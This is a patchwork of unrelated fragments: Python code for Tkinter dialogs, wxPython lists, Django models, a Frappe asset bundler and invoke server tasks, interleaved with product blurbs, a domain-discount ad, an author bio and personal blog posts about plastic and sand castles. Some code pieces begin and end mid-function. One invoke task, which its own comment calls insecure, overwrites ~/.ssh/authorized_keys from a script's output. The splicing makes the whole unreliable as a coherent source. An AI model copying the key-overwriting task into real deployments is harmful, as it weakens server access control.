default: default filename to return :param object filetypes: filemasks that a user can choose, e.g. 
" \*.txt" :return: the name of a file, or None if user chose to cancel """ localRoot = Tk() localRoot.withdraw() initialbase, initialfile, initialdir, filetypes = fileboxSetup( default, filetypes) f = ut.tk_FileDialog.asksaveasfilename(parent=localRoot, title=getFileDialogTitle(msg, title), initialfile=initialfile, initialdir=initialdir, filetypes=filetypes ) localRoot.destroy() if not f: return None return os.path.normpath(f) # ------------------------------------------------------------------- # # fileboxSetup # # ------------------------------------------------------------------- def fileboxSetup(default, filetypes): if not default: default = os.path.join(".", "*") initialdir, initialfile = os.path.split(default) if not initialdir: initialdir = "." if not initialfile: initialfile = "*" initialbase, initialext = os.path.splitext(initialfile) initialFileTypeObject = FileTypeObject(initialfile) allFileTypeObject = FileTypeObject("*") ALL_filetypes_was_specified = False if not filetypes: filetypes = list() filetypeObjects = list() for filemask in filetypes: fto = FileTypeObject(filemask) if fto.isAll(): ALL_filetypes_was_specified = True # remember this if fto == initialFileTypeObject: initialFileTypeObject.add(fto) # add fto to initialFileTypeObject else: filetypeObjects.append(fto) # ------------------------------------------------------------------ # make sure that the list of filetypes includes the ALL FILES type. # ------------------------------------------------------------------ if ALL_filetypes_was_specified: pass elif allFileTypeObject == initialFileTypeObject: pass else: filetypeObjects.insert(0, allFileTypeObject) # ------------------------------------------------------------------ # Make sure that the list includes the initialFileTypeObject # in the position in the list that will make it the default. # This changed between Python version 2.5 and 2.6 # ------------------------------------------------------------------ if len(filetypeObjects) == 0: filetypeObjects.append(initialFileTypeObject) if initialFileTypeObject in (filetypeObjects[0], filetypeObjects[-1]): pass else: if ut.runningPython27: filetypeObjects.append(initialFileTypeObject) else: filetypeObjects.insert(0, initialFileTypeObject) filetypes = [fto.toTuple() for fto in filetypeObjects] return initialbase, initialfile, initialdir, filetypes def __buttonEvent(event=None, buttons=None, virtual_event=None): """ Handle an event that is generated by a person interacting with a button. It may be a button press or a key press. 
""" # TODO: Replace globals with tkinter variables global boxRoot, __replyButtonText # Determine window location and save to global m = re.match("(\d+)x(\d+)([-+]\d+)([-+]\d+)", boxRoot.geometry()) if not m: raise ValueError( "failed to parse geometry string: {}".format(boxRoot.geometry())) width, height, xoffset, yoffset = [int(s) for s in m.groups()] st.rootWindowPosition = '{0:+g}{1:+g}'.format(xoffset, yoffset) # print('{0}:{1}:{2}'.format(event, buttons, virtual_event)) if virtual_event == 'cancel': for button_name, button in list(buttons.items()): if 'cancel_choice' in button: __replyButtonText = button['original_text'] __replyButtonText = None boxRoot.quit() return if virtual_event == 'select': text = event.widget.config('text')[-1] if not isinstance(text, ut.str): text = ' '.join(text) for button_name, button in list(buttons.items()): if button['clean_text'] == text: __replyButtonText = button['original_text'] boxRoot.quit() return # Hotkeys if buttons: for button_name, button in list(buttons.items()): hotkey_pressed = event.keysym if event.keysym != event.char: # A special character hotkey_pressed = '<{}>'.format(event.keysym) if button['hotkey'] == hotkey_pressed: __replyButtonText = button_name boxRoot.quit() return print("Event not understood") def __put_buttons_in_buttonframe(choices, default_choice, cancel_choice): """Put the buttons in the buttons frame """ global buttonsFrame, cancel_invoke # TODO: I'm using a dict to hold buttons, but this could all be cleaned up if I subclass Button to hold # all the event bindings, etc # TODO: Break __buttonEvent out into three: regular keyboard, default # select, and cancel select. unique_choices = ut.uniquify_list_of_strings(choices) # Create buttons dictionary and Tkinter widgets buttons = dict() for button_text, unique_button_text in zip(choices, unique_choices): this_button = dict() this_button['original_text'] = button_text this_button['clean_text'], this_button[ 'hotkey'], hotkey_position = ut.parse_hotkey(button_text) this_button['widget'] = Button(buttonsFrame, takefocus=1, text=this_button['clean_text'], underline=hotkey_position) this_button['widget'].pack( expand=YES, side=LEFT, padx='1m', pady='1m', ipadx='2m', ipady='1m') buttons[unique_button_text] = this_button # Bind arrows, Enter, Escape for this_button in list(buttons.values()): bindArrows(this_button['widget']) for selectionEvent in st.STANDARD_SELECTION_EVENTS: this_button['widget'].bind("<{}>".format(selectionEvent), lambda e: __buttonEvent( e, buttons, virtual_event='select'), add=True) # Assign default and cancel buttons if cancel_choice in buttons: buttons[cancel_choice]['cancel_choice'] = True boxRoot.bind_all('<Escape>', lambda e: __buttonEvent( e, buttons, virtual_event='cancel'), add=True) boxRoot.protocol('WM_DELETE_WINDOW', lambda: __buttonEvent( None, buttons, virtual_event='cancel')) if default_choice in buttons: buttons[default_choice]['default_choice'] = True buttons[default_choice]['widget'].focus_force() # Bind hotkeys for hk in [button['hotkey'] for button in list(buttons.values()) if button['hotkey']]: boxRoot.bind_all(hk, lambda e: __buttonEvent(e, buttons), add=True) return
This cheese and red wine hamper is an original Valentine's gift. We have made it even more special than our other great wine and cheese gifts by creating a special front label, designed with a fun 'Be Mine' crossed out to 'Be Wine' message - which we think is better! The bottle of Spanish red wine is combined with two artisan-made cheese truckles - a mature cheddar infused with port and brandy called Ruby Mist, and a mature Red Leicester (which is truly surprising in its absolute deliciousness) - plus sourdough crackers and a generous jar of handmade, real ale chutney. A winning combination! Just make sure you don't send it as a birthday present to your boss and start rumours!
import wx


class VirtualList(wx.ListCtrl):

    def __init__(self, parent, **kwargs):
        super(VirtualList, self).__init__(parent, wx.ID_ANY,
                                          style=wx.LC_VIRTUAL | wx.LC_REPORT |
                                          wx.LC_VRULES | wx.LC_HRULES,
                                          **kwargs)
        self.data = None
        self.columns = []

    def setData(self, data):
        self.data = data
        print data

    def RefreshAllItems(self):
        if self.data:
            if self.DeleteAllItems():
                if self.DeleteAllColumns():
                    self.SetItemCount(len(self.data))
                    self.RefreshItems(0, len(self.data) - 1)
                    return True
        return False

    def OnGetItemText(self, item, col):
        return self.data[item][col]

    def InsertColumns(self, columnList):
        self.columns = columnList
        for column in columnList:
            super(VirtualList, self).InsertColumn(
                columnList.index(column), column)

    def getColumnText(self, index):
        return self.columns[index]
Discounts for .COM.PE web domain registrations or renewals. Check the prices and domain features offered for .COM.PE below. .COM.PE is a country domain for Peru. This type of web domain can be registered for a period of 1 to 5 years. Using the partner promo code above, you can claim up to 40% discounts on registrations and renewals. The discount is based on the yearly accumulated cost of the domains managed under Netim, so the more domains you register and maintain with Netim, the better the discount rates. For example, once you reach 250 Euro of expenditure per year, you move to the second-level rates, which bring a 36% discount; for orders totaling over 750 Euro in a year, the discount reaches 40%. As Netim manages over 800 domain extensions, discounts are calculated per individual domain TLD type. .COM.PE web domain services and rates are provided as listed; further discounts may apply based on the discount codes above. Netim is a worldwide accredited registrar with a global offer of over 800 web domain extensions, with international and geographic reach. Registration of .com.pe domains with Netim is quick and secure.
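The tiered pricing can be summarised in a few lines of code. The sketch below is purely illustrative: only the two tiers actually mentioned in the text (250 and 750 Euro) are encoded, and the function name and thresholds are assumptions rather than any real Netim API or rate card.

# Illustrative sketch of the tiered discount described above.
# The real rate card has more levels; these two are the ones named in the text.
def discount_rate(yearly_spend_eur):
    """Return the discount fraction for a given yearly accumulated spend (EUR)."""
    if yearly_spend_eur >= 750:
        return 0.40   # top tier mentioned in the text
    if yearly_spend_eur >= 250:
        return 0.36   # "second level" rates
    return 0.0        # base pricing, no volume discount

print(discount_rate(300))  # -> 0.36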
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.translation import ugettext_lazy as _

from livinglots_organize.models import BaseOrganizer


class OptedInStewardProjectManager(models.Manager):
    """
    A manager that only returns StewardProject instances where the group
    asked to be included on the map.
    """

    def get_queryset(self):
        return super(OptedInStewardProjectManager, self).get_queryset().filter(
            include_on_map=True,
        )


class StewardProjectMixin(models.Model):

    objects = models.Manager()
    opted_in = OptedInStewardProjectManager()

    project_name = models.CharField(_('project name'),
        max_length=256,
        help_text=_('The name of the project using this lot.'),
    )
    use = models.ForeignKey('livinglots_lots.Use',
        limit_choices_to={'visible': True},
        help_text=_('How is the project using the land?'),
        verbose_name=_('use'),
    )
    support_organization = models.CharField(_('support organization'),
        max_length=300,
        blank=True,
        null=True,
        help_text=_("What is your project's support organization, if any?"),
    )
    land_tenure_status = models.CharField(_('land tenure status'),
        choices=(
            ('owned', _('project owns the land')),
            ('licensed', _('project has a license for the land')),
            ('lease', _('project has a lease for the land')),
            ('access', _('project has access to the land')),
            ('not sure', _("I'm not sure")),
        ),
        default=_('not sure'),
        max_length=50,
        help_text=_('What is the land tenure status for the project? (This '
                    'will not be shared publicly.)'),
    )
    include_on_map = models.BooleanField(_('include on map'),
        default=True,
        help_text=_('Can we include the project on our map?'),
    )

    class Meta:
        abstract = True


class BaseStewardProject(StewardProjectMixin):

    started_here = models.BooleanField(default=False)

    content_type = models.ForeignKey(ContentType, related_name='+')
    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey('content_type', 'object_id')

    class Meta:
        abstract = True


class BaseStewardNotification(StewardProjectMixin, BaseOrganizer):
    """
    A notification from someone who is part of a stewarding project letting
    us know that they are stewards on a given lot.
    """

    class Meta:
        abstract = True

    def __unicode__(self):
        return self.name
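The opted_in manager exists so map views can pull only the projects whose groups consented to being shown. A minimal sketch of how a concrete subclass might use it follows; the StewardProject model, the import path, and the queries are hypothetical illustrations, since the classes above are all abstract.

# Hypothetical concrete model and queries, for illustration only.
from livinglots_steward.models import BaseStewardProject  # assumed app path


class StewardProject(BaseStewardProject):
    """Concrete steward project; inherits both managers from the mixin."""
    pass


# All projects, regardless of map consent:
every_project = StewardProject.objects.all()

# Only projects that agreed to appear on the public map:
mappable_projects = StewardProject.opted_in.all()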
Kerry Winfrey is the author of LOVE AND OTHER ALIEN EXPERIENCES and THINGS JOLIE NEEDS TO DO BEFORE SHE BITES IT. She’s written for many websites, including HelloGiggles. When she’s not writing, she’s most likely baking yet another batch of cookies or watching far, far too many romantic comedies. She lives with her husband, baby, and dog in the middle of Ohio.
# -*- coding: utf-8 -*-
#
# This software is licensed as described in the file license.txt, which
# you should have received as part of this distribution.

from core import *


class InstancePool(object):
    """
    Container for instances of Instance and Entity, that provides some
    utility methods to search through them.
    """

    def __init__(self):
        self._items = []
        # Handle special case of the top-most classes of the instantiation
        # chain (Entity and Instance). They are not loaded explicitly, and
        # are always available from any pool.
        self.add(Entity)
        self.add(Instance)

    def add(self, instance):
        id = instance.get_id()
        if not id is None and not self.get_item(id) is None:
            # raising an exception is an option. an alternative would be to
            # silently replace the instance with the one being loaded, but
            # there may be implications when working with multiple versions
            # of a same instance
            raise Exception("Instance with id '%s' already exists in the pool"
                            % (instance.get_id(),))
        self._items.append(instance)

    def remove(self, item):
        self._items.remove(item)

    def get_item(self, id):
        assert(not id is None)
        for item in self._items:
            if item.get_id() == id:
                return item
        return None

    def get_items(self, levels=(0, 1, 2), base_name=None):
        result = self._items
        if not levels == (0, 1, 2):
            result = [item for item in result
                      if isinstance(item, Instance) and 0 in levels
                      or isinstance(item, Entity) and 1 in levels
                      or item in (Entity, Instance) and 2 in levels]
        if not base_name is None:
            base = self.get_item(base_name)
            result = [item for item in result
                      if isinstance(item, Entity) and len(item.__bases__) > 0
                      and item.__bases__[0] is base]
        return result

    def get_instances_of(self, spec_name, direct_instances_only=False):
        assert(not spec_name is None)
        if direct_instances_only:
            return [item for item in self._items
                    if hasattr(item.__class__, 'name')
                    and item.__class__.name == spec_name]
        else:
            spec_and_childs = self.get_spec_and_child_specs(spec_name)
            return [item for item in self._items
                    if item.__class__ in spec_and_childs]

    def get_spec_and_child_specs(self, spec_name):
        inh_chain = current = [self.get_item(spec_name)]
        while True:
            childs = [self.get_items(base_name=spec.get_name())
                      for spec in current]
            current = [child for sublist in childs for child in sublist]
            if len(current) == 0:
                break
            inh_chain.extend(current)
        return inh_chain

    def get_possible_domains(self):
        pool = self
        possible_domains = {'string': 'string'}
        possible_domains.update(dict([(i.get_identifier(), i.get_name())
                                      for i in pool.get_items(levels=(1,))]))
        return possible_domains
TRAVEL

Unit price, including your logo:

Code   Product                                             50+      100+     250+     500+
J2300  Meridian Travel Wallet (printed)                    $12.44   $9.89    $9.23    call
J2300  Meridian Travel Wallet (engraved on accent plate)   $12.08   $10.70   $10.11   call
G3690  Everest First Aid Kit                               n/a      $6.62    $5.64    call
G3300  Escape Travel Pack                                  $8.92    $7.53    $6.48    call

Pen additional. Optional laser engraving on accent plate.

Meridian Travel Wallet (J2300)
This soft grain finish zippered travel wallet makes the ideal travel companion. Features include a passport pocket, multiple card pockets, ticket flap, security compartment with zip and pen loop. Your logo can be printed onto the wallet or engraved on the brushed chrome accent plate.
Product size: 13cm x 24.5cm high
Imprint method: Pad print (laser engrave optional)
Imprint area: Pad print: 30mm x 45mm wide; Laser engrave: 8mm x 28mm wide (on accent plate). Optional printing on back.

Everest First Aid Kit (G3690)
This go-anywhere first aid kit contains adhesive bandages, wipes, tweezers and much more....all supplied in a protective water resistant case.
Imprint method: Pad print
Imprint area: 18mm x 45mm wide (front) or 30mm x 45mm wide (back)

Escape Travel Pack (G3300)
This must-have travel pack contains everything you will ever need for your next trip away. It includes an inflatable neck pillow, eye covers, ear plugs and a combination travel lock, all securely packed into a transparent zippered pouch.
Imprint method: Pad print
Imprint area: 15mm x 60mm wide

There is a setup charge of $75.00. Prices include laser engraving or one colour printing in one position as indicated. Please add 10% GST to all prices. Prices are subject to change without notice. Please check our website for current prices (www.primepromotional.com.au).
"""This file is part of matrix2latex. matrix2latex is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. matrix2latex is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with matrix2latex. If not, see <http://www.gnu.org/licenses/>. """ import re def fix(s, table=False): """ input: (string) s output: (string) s takes any number in s and replaces the format '8e-08' with '8\e{-08}' """ i = re.search('e[-+]\d\d', s) while i != None: before = s[0:i.start()] number = s[i.start()+1:i.start()+4] after = s[i.end():] if table: num = "%(#)+03d" % {'#': int(number)} else: num = "%(#)3d" % {'#': int(number)} s = '%s\\e{%s}%s' % (before, num, after) i = re.search('e[-+]\d\d', s) return s
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt

from __future__ import unicode_literals
from frappe.utils.minify import JavascriptMinify

"""
Build the `public` folders and setup languages
"""

import os, sys, frappe, json, shutil
from cssmin import cssmin


def bundle(no_compress, make_copy=False, verbose=False):
    """concat / minify js files"""
    # build js files
    make_asset_dirs(make_copy=make_copy)
    build(no_compress, verbose)


def watch(no_compress):
    """watch and rebuild if necessary"""
    import time

    build(no_compress=True)

    while True:
        if files_dirty():
            build(no_compress=True)

        time.sleep(3)


def make_asset_dirs(make_copy=False):
    assets_path = os.path.join(frappe.local.sites_path, "assets")
    for dir_path in [
            os.path.join(assets_path, 'js'),
            os.path.join(assets_path, 'css')]:
        if not os.path.exists(dir_path):
            os.makedirs(dir_path)

    # symlink app/public > assets/app
    for app_name in frappe.get_all_apps(True):
        pymodule = frappe.get_module(app_name)
        source = os.path.join(os.path.abspath(os.path.dirname(pymodule.__file__)), 'public')
        target = os.path.join(assets_path, app_name)

        if not os.path.exists(target) and os.path.exists(source):
            if make_copy:
                shutil.copytree(os.path.abspath(source), target)
            else:
                os.symlink(os.path.abspath(source), target)


def build(no_compress=False, verbose=False):
    assets_path = os.path.join(frappe.local.sites_path, "assets")

    for target, sources in get_build_maps().iteritems():
        pack(os.path.join(assets_path, target), sources, no_compress, verbose)

    shutil.copy(os.path.join(os.path.dirname(os.path.abspath(frappe.__file__)),
        'data', 'languages.txt'), frappe.local.sites_path)
    # reset_app_html()


def get_build_maps():
    """get all build.jsons with absolute paths"""
    # framework js and css files
    pymodules = [frappe.get_module(app) for app in frappe.get_all_apps(True)]
    app_paths = [os.path.dirname(pymodule.__file__) for pymodule in pymodules]

    build_maps = {}
    for app_path in app_paths:
        path = os.path.join(app_path, 'public', 'build.json')
        if os.path.exists(path):
            with open(path) as f:
                try:
                    for target, sources in json.loads(f.read()).iteritems():
                        # update app path
                        source_paths = []
                        for source in sources:
                            if isinstance(source, list):
                                s = frappe.get_pymodule_path(source[0], *source[1].split("/"))
                            else:
                                s = os.path.join(app_path, source)
                            source_paths.append(s)

                        build_maps[target] = source_paths
                except Exception, e:
                    print path
                    raise
    return build_maps


timestamps = {}


def pack(target, sources, no_compress, verbose):
    from cStringIO import StringIO

    outtype, outtxt = target.split(".")[-1], ''
    jsm = JavascriptMinify()

    for f in sources:
        suffix = None
        if ':' in f:
            f, suffix = f.split(':')
        if not os.path.exists(f) or os.path.isdir(f):
            print "did not find " + f
            continue
        timestamps[f] = os.path.getmtime(f)
        try:
            with open(f, 'r') as sourcefile:
                data = unicode(sourcefile.read(), 'utf-8', errors='ignore')

            extn = f.rsplit(".", 1)[1]

            if outtype=="js" and extn=="js" and (not no_compress) and suffix!="concat" and (".min." not in f):
                tmpin, tmpout = StringIO(data.encode('utf-8')), StringIO()
                jsm.minify(tmpin, tmpout)
                minified = tmpout.getvalue()
                outtxt += unicode(minified or '', 'utf-8').strip('\n') + ';'

                if verbose:
                    print "{0}: {1}k".format(f, int(len(minified) / 1024))
            elif outtype=="js" and extn=="html":
                # add to frappe.templates
                content = data.replace("\n", " ").replace("'", "\'")
                outtxt += """frappe.templates["{key}"] = '{content}';\n""".format(
                    key=f.rsplit("/", 1)[1][:-5], content=content)
            else:
                outtxt += ('\n/*\n *\t%s\n */' % f)
                outtxt += '\n' + data + '\n'
        except Exception, e:
            print "--Error in:" + f + "--"
            print frappe.get_traceback()

    if not no_compress and outtype == 'css':
        pass
        #outtxt = cssmin(outtxt)

    with open(target, 'w') as f:
        f.write(outtxt.encode("utf-8"))

    print "Wrote %s - %sk" % (target, str(int(os.path.getsize(target)/1024)))


def files_dirty():
    for target, sources in get_build_maps().iteritems():
        for f in sources:
            if ':' in f:
                f, suffix = f.split(':')
            if not os.path.exists(f) or os.path.isdir(f):
                continue
            if os.path.getmtime(f) != timestamps.get(f):
                print f + ' dirty'
                return True
    else:
        return False
The Bikini Girl from Italy with the second bag, full of rubbish. Chicken wings in a re-usable container? Madness! This could be the most important photo you see all year! My heart was pounding and I hid under my hat like a criminal planning a crime as I waited for the queue to disperse in front of the deli counter in a supermarket. When it was all clear, I chose an employee who looked kind and competent and gingerly asked if I could buy 2 kilos of uncooked chicken wings and have them put straight into my re-usable container. The lady behind the counter looked startled and said she had to ask the manager; she returned a few minutes later saying it was OK. She set the scales to deduct the weight of the container and stuck the barcode sticker straight onto the outside of my re-usable plastic container, which I then scanned at the self-serve terminal. I feel like I have just changed the world. Stay tuned for more plastic reduction updates. Three baby mice found and photographed by the author.
# -*- coding:utf8 -*-
from django import template
from django.db.models import Q

from icomments.models import Comments
from icomments.forms import ComForm

register = template.Library()


def show_comment(value):
    '''Article comments for a post'''
    comform = ComForm()
    # Fetch approved (0) or hidden (3) comments for this post
    comments = Comments.objects.filter(Q(approved=0) | Q(approved=3)).filter(post_id=value)
    # Build the nested (threaded) comment structure:
    # each entry is [id, parent_id, children, depth, comment_object]
    dic = {i.id: [i.id, i.parent, [], 0, i] for i in comments}
    stack = []
    for c in dic:
        i = dic[c]
        pid = i[1]
        if pid != 0 and dic.get(pid) is not None:
            p = dic[pid]
            p[2].append(i)
            i[3] = p[3] + 1
        else:
            stack.insert(0, i)
    # Flatten the tree depth-first so replies follow their parents
    result = []
    while stack:
        top = stack.pop()
        result.append(top[4])
        top[2].reverse()
        stack.extend(top[2])
    comments = result
    return {'comments': comments, 'comform': comform, 'comment_post_id': value}

register.inclusion_tag('icomments/comment.html')(show_comment)


def show_latest_comment():
    # Latest five approved top-level comments
    comments = Comments.objects.filter(Q(parent=0) & Q(approved=0))[:5]
    return {'comments': comments}

register.inclusion_tag('icomments/comment_latest.html')(show_latest_comment)
These resources are good for people who have had some experience in programming. The list of resources has a strong focus on client-side (browser) programming, but some bits cover server-side (NodeJS) programming too. These resources can be used concurrently; there is no need to finish the online course first or start with the books only. The other notable reference sites are Web Platform, Can I use and DevDocs. All modern browsers have built-in debuggers that show currently loaded resources (scripts, CSS, images, cookies, fonts, etc.), network requests, console output, script errors and more. It is essential to learn to use the debugger as soon as possible so you can inspect script errors rather than waste time guessing at them (as developers had to in the darker days of IE7). Further references can be found here for Chrome and here for Firefox.
#!/usr/bin/python
# -*- encoding: utf-8 -*-
################################################################################
#
# Copyright (C) 2010 - 2015 Dharmesh Patel <[email protected]>.
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################

name = 'shoppingCart'
version = '1.4.2'
major_version = '1'
description = 'shoppingCart is an open source cart developed using the Python language to manage carts in Ecommerce applications.'
long_description = """
Major Feature(s):
1. Product options support.
2. Multi discount support.
3. Multi tax support (specific to product as well as general taxes).
4. Multi currency support.
5. Tax Exclude and Include total.
6. Shipping method and charge.
"""
classifiers = [
    "Development Status :: 5 - Production/Stable",
    "License :: OSI Approved :: BSD License",
    "Programming Language :: Python"
]
url = 'https://github.com/dharmeshpatel/shoppingcart'
author = 'Dharmesh Patel'
author_email = 'mr[dot]dlpatel[at]gmail[dot]com'
copyright = 'Copyright (c) 2010 - 2015 Dharmesh Patel'
license = 'BSD'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
Publisher’s Note: SNS members have been watching the world of paying electronically for a decade or more, from Smartcards (an early Japanese success story, vs. the U.S.) to Paying by Cellphone (also pioneered commercially here, although invented in Finland). Members also know that this trend is ready to move from Asia to the U.S. and Europe, and that it will involve the handling of billions of dollars in transactions, and may lead to a redefinition of how banking, bank cards, and cellular networks make their money. William Saito has been kind enough to take time from his duties as CEO of Intecur to lay out the current landscape of electronic transactions in Asia. Despite cultural and use differences, members can be assured that some version of what they read here is already on its way to adoption in Europe and the U.S. Those who get in front of this trend will benefit hugely; those who ignore it will be at risk. This trend represents a deep structural change in the financial world. — mra.
import os import subprocess import shlex from invoke import task, run from invoke.exceptions import Failure YOUR_APP_NAME = "threepanel" HOME_PATH = os.environ['HOME'] DJANGO_PATH = os.path.join(HOME_PATH, 'vagrant_django', YOUR_APP_NAME) SCRIPTS_PATH = os.path.join(HOME_PATH, 'vagrant_django', 'scripts') UWSGI_LOG_PATH = os.path.join(HOME_PATH, 'logs', 'uwsgi.log') UWSGI_SH_PATH = os.path.join(HOME_PATH, 'uwsgi.sh') UWSGI_PID_PATH = os.path.join(HOME_PATH, 'uwsgi.pid') def python(): thing = run("python --version") if str(thing.stdout).startswith("Python 3."): return "python" else: return "python3" def background(cmd): subprocess.Popen(shlex.split(cmd)) def multiple(*args): return " && ".join(args) @task def home(command, *args, **kwargs): """ Run a command from the base django directory """ return run(multiple("cd {}".format(DJANGO_PATH), command), *args, **kwargs) @task def test(): """ Run all the tests. """ return dj("test images dashboard comics") @task def lint(): """ Run the PEP8 and Pyflakes linters """ return home("pylint *") @task def search(stuff): """ Ack around for stuff """ return home("ack {}".format(stuff)) @task def dj(command, *args, **kwargs): """ Run a django manage.py command """ return home("{} manage.py {}".format(python(), command), *args, **kwargs) @task() def runserver(): """ Run a django development server """ print("Running server on localhost:8080 (Vagrant Host:18080)") return dj("runserver 0:8080", pty=True) @task() def dev_start(): """ Run a django development server """ return runserver() @task def makemigrations(): """ Prep the prepping of the database """ return dj("makemigrations") @task def collectstatic(): """ Collect all of the static files from the django codebase and plop them in the STATIC_ROOT defined in settings.py """ return dj("collectstatic --clear --noinput") @task def migrate(): """ Prep the database """ return dj("migrate") @task def auth_keys(): """ Do something insecure and terrible """ return run("python3 /home/vagrant/vagrant_django/keys.py > ~/.ssh/authorized_keys") @task() def dump(): """ Dump the Postgres DB to a file. """ print("Dumping DB") run("dos2unix {}/backup_postgres.sh".format(SCRIPTS_PATH)) run("bash {}/backup_postgres.sh".format(SCRIPTS_PATH)) @task() def restore(filename): """ Restore the Postgres DB from a file. hey, past Curtis, does this actually work? be honest """ print("Dumping DB") dump() print("Destrying DB") run("dos2unix {}/reset_postgres.sh".format(SCRIPTS_PATH)) run("bash {}/reset_postgres.sh".format(SCRIPTS_PATH)) print("Restoring DB from file: {}".format(filename)) run("dos2unix {}/rebuild_postgres.sh".format(SCRIPTS_PATH)) run("bash {}/rebuild_postgres.sh {}".format(SCRIPTS_PATH, filename), echo=True) @task() def clear(): """ Destroy and recreate the database """ print("Resetting db") dump() run("dos2unix {}/reset_postgres.sh".format(SCRIPTS_PATH)) run("bash {}/reset_postgres.sh".format(SCRIPTS_PATH)) dj("makemigrations") dj("migrate --noinput") #dj("testdata") @task def uwsgi(): """ Activate the Python Application Server. """ print("writing logs to {}".format(UWSGI_LOG_PATH)) print("writing pidfile to {}".format(UWSGI_PID_PATH)) background("bash {}/uwsgi.sh".format(SCRIPTS_PATH)) @task def kill_uwsgi(): if os.path.exists("{}/uwsgi.pid".format(HOME_PATH)): print("Killing UWSGI...") return run("kill `cat {}/uwsgi.pid`".format(HOME_PATH), pty=True) print("UWSGI Dead...") else: print("UWSGI not running!") @task def celery(): """ Activate the task running system. 
""" print("Activating celery worker.") background("bash {}/celery.sh".format(SCRIPTS_PATH)) @task def kill_celery(): if os.path.exists("{}/celery.pid".format(HOME_PATH)): print("Killing Celery...") return run("kill `cat {}/celery.pid`".format(HOME_PATH), pty=True) print("Celery Dead...") else: print("Celery not running!") @task def postgres(): print("Starting Postgres...") return run("sudo service postgresql start") @task def kill_postgres(): print("Killing Postgres...") return run("sudo service postgresql stop") @task def nginx(): print("Starting Nginx...") return run("sudo service nginx start") @task def kill_nginx(): print("Killing Nginx...") return run("sudo service nginx stop") @task def redis(): print("Starting Redis...") return run("sudo service redis-server start") @task def kill_redis(): print("Killing Redis...") return run("sudo service redis-server stop") @task def restart_syslog(): print("Restarting Syslog...") return run("sudo service rsyslog restart") @task def remote_syslog(): """ Activate remote_syslog to pull celery logs to papertrail. """ print("Activating remote_syslog.") background("bash {}/remote_syslog.sh".format(SCRIPTS_PATH)) @task def kill_remote_syslog(): if os.path.exists("{}/remote_syslog.pid".format(HOME_PATH)): print("Killing Remote Syslog...") return run("kill `cat {}/remote_syslog.pid`".format(HOME_PATH), pty=True) print("Remote Syslog Dead...") else: print("Remote Syslog not running!") @task def prod_start(): """ Start all of the services in the production stack""" collectstatic() postgres() uwsgi() celery() nginx() redis() restart_syslog() return remote_syslog() @task def prod_stop(): """ Stop all of the services in the production stack""" kill_postgres() kill_uwsgi() kill_celery() kill_nginx() kill_remote_syslog() return kill_redis() @task def prod_restart(): """ Restart all of the services in the production stack """ prod_stop() return prod_start()
Beautiful breeze out of the West today. It was great weather today, building my castle. Caleb and Kristine, 8 year old twins, worked with their brother, Davey, 5 years old, and made a great castle. They are from Lancaster County, Pennsylvania. Here’s my castle today, but I just got the bad news that it was destroyed before sunset tonight. I am going home tomorrow, and won’t build tomorrow, but will be back Tuesday, and hopefully will build again. Jeremy built a great castle in record time! His mom said they had to leave in 20 minutes, and he wasted no time! He’s 12, and lives in Port Tobacco, Maryland. Amelia built her first castle today. She’s 8, lives in Lewes, and was here with her Grandma Sue, who is from Greenfield, Massachusetts. Even though thunder chased me (and everyone else), I did get to meet a girl I taught last year. Ashley, 11, was with her mom, and brought her friend, Scarlett, also 11. They were really trying to get a castle built in between threatening storms! I also met 3 friends from Pennsylvania only here for the weekend: Kira, Tabitha, and one more friend whom I didn’t get a chance to meet. Beautiful, personable girls, who were fun to talk with; I only wish the weather would have cooperated! Friday’s castle, with new friends. I know how to build castles, but not how to make these pictures behave. Here are new friends Max and his Aunt Janice, with my castle today. First castle of the summer for me. I met a sweet 6 year old, Amelia, from Connecticut today, and showed her all I know about castles. Really looking forward to August! I am really looking forward to building sand castles August 7th to the 23rd! I will return for one more week on September 11th till the 18th. I hope to see you all then!
# A simple example to retrieve all users for a team while using a _token_ # from the .netrc file instead of a password (as requests assumes by default) import logging import requests import netrc from mattermostdriver import Driver logging.basicConfig( format='%(levelname)s - %(name)s - %(asctime)s - %(message)s' ) logger = logging.getLogger( 'MattermostManager' ) logger.setLevel( logging.INFO ) # requests overrides the simple authentication token header if it finds the entry in # the ~/.netrc file. Since we want to use ~/.netrc to retrieve the _token_, we need # to provide our own Authenticator class: class TokenAuth( requests.auth.AuthBase ) : def __call__( self, r ) : # Implement my authentication mmHost = 'mattermost.host.in.netrc' (login, account, password) = netrc.netrc().authenticators( mmHost ) r.headers[ 'Authorization' ] = "Bearer %s" % password return r class MattermostManager( object ) : def __init__( self ) : # Get the _token_ (as "password") from the ~/.netrc file. # the corresponding line in the file should look like: # <mattermost.host.in.netrc> foo foo <long-string-of-token> # The "login" and "account" (both set to "foo" in the example are ignored) mmHost = 'mattermost.host.in.netrc' (login, account, password) = netrc.netrc().authenticators( mmHost ) logger.debug( "Going to set up driver for connection to %s " % (mmHost,) ) self.mmDriver = Driver( options={ 'url' : mmHost, 'scheme' : 'https', 'port' : 443, 'auth' : TokenAuth, # use the new Authenticator class defined above } ) self.mmDriver.users.get_user( user_id='me' ) def getTeamMembers( self, teamName ) : # for restricted teams, we need to get the ID first, and # for this, we need to have the "name" (as in the URL), not # the "display name", as shown in the GUIs: team0 = self.mmDriver.teams.get_team_by_name( teamName ) logger.debug( 'team by name %s : %s' % (teamName, team0) ) teamId = team0[ 'id' ] team = self.mmDriver.teams.check_team_exists( teamName ) logger.debug( 'team %s - exists: %s' % (teamName, team[ 'exists' ]) ) if not team[ 'exists' ] : 